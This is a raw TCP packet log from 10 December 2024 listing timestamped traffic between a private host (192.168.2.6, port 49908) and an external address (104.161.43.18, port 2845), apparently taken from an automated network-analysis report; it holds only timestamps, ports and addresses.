                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.452954054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.453138113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.454381943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.454399109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.454497099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.454497099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.455384016 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.455398083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.455446005 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.456022978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.456131935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.457119942 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.457182884 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.457195997 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.457314968 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.458089113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.458190918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.458256006 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.459219933 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.459233046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.460200071 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.460227966 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.460285902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.460897923 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.461294889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.461308956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.462542057 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.463390112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.463402987 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.463414907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.463500977 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.463524103 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.464425087 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.464438915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.464453936 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.465488911 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.465516090 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.465822935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.466342926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.466367960 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.466890097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.467366934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.467391014 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.467468023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.467665911 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.468441963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.469242096 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470138073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470150948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470170975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470453024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470489979 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.470597029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.471563101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.471591949 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.471679926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.472503901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.472594023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.473570108 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.473597050 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.473609924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.474565029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.474590063 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.474694014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.475558043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.475586891 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.475713968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.476587057 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.476680994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.477663994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.477696896 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.477746010 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.478646040 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.478681087 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.478766918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.479226112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.479707956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.479859114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.480712891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.480737925 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.480846882 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.481699944 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.481739998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.481849909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.482783079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.482806921 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.482875109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.483817101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.483835936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.483845949 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.484813929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.484839916 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.484937906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.486015081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.486027956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.486041069 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.486860037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.486882925 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.487063885 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.487669945 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.487916946 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.488193989 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.489033937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.489057064 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.489211082 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.489944935 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.489978075 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.490386009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.490981102 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.491019011 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.491355896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.492130041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.492152929 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.492423058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493096113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493119001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493294001 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493590117 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493645906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.493695021 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.494836092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.494848967 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.494865894 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.495616913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.495637894 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.495709896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.503688097 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.634569883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.634593010 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.639945030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.639961004 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.639978886 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.639986038 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640002012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640016079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640022039 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640033007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640037060 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640048981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640062094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640078068 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640090942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640110970 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640155077 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640173912 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.640291929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.641582012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.641594887 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.641644001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.641644001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.642263889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.642321110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.643377066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.643397093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.643661022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.644428968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.644442081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.645287037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.645317078 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.645364046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.645364046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.645483971 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.646553993 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.646565914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.647357941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.647433996 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.647612095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.647659063 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.649193048 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.649207115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650243998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650258064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650265932 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650469065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650489092 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.650547981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.651662111 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.651693106 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.651705980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.652746916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.652760029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.652770042 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.653522968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.653548956 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.653609991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.654591084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.654603958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.654617071 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.655659914 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.655684948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.655698061 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.656708956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.656722069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.656728983 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.657623053 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.657685041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.657766104 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.658751965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.658816099 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.659516096 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.659678936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.660017014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.660963058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.660975933 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.661035061 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.661035061 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.661806107 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.661849022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.662761927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.662911892 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.663672924 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.663980961 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.663994074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.664844036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.664868116 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.664896011 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.665841103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.665858984 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.665923119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.666927099 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.666945934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.667021036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.667656898 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.667898893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.668018103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.668997049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.669015884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.669064045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.670011997 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.670032978 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.670046091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.671153069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.671165943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.671175957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.671659946 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.672580004 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.672594070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.673126936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.673146963 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.673306942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.673921108 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.674084902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.674261093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.675369978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.675390005 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.675661087 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.676126957 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.676235914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.677125931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.677148104 CET499082845192.168.2.6104.161.43.18
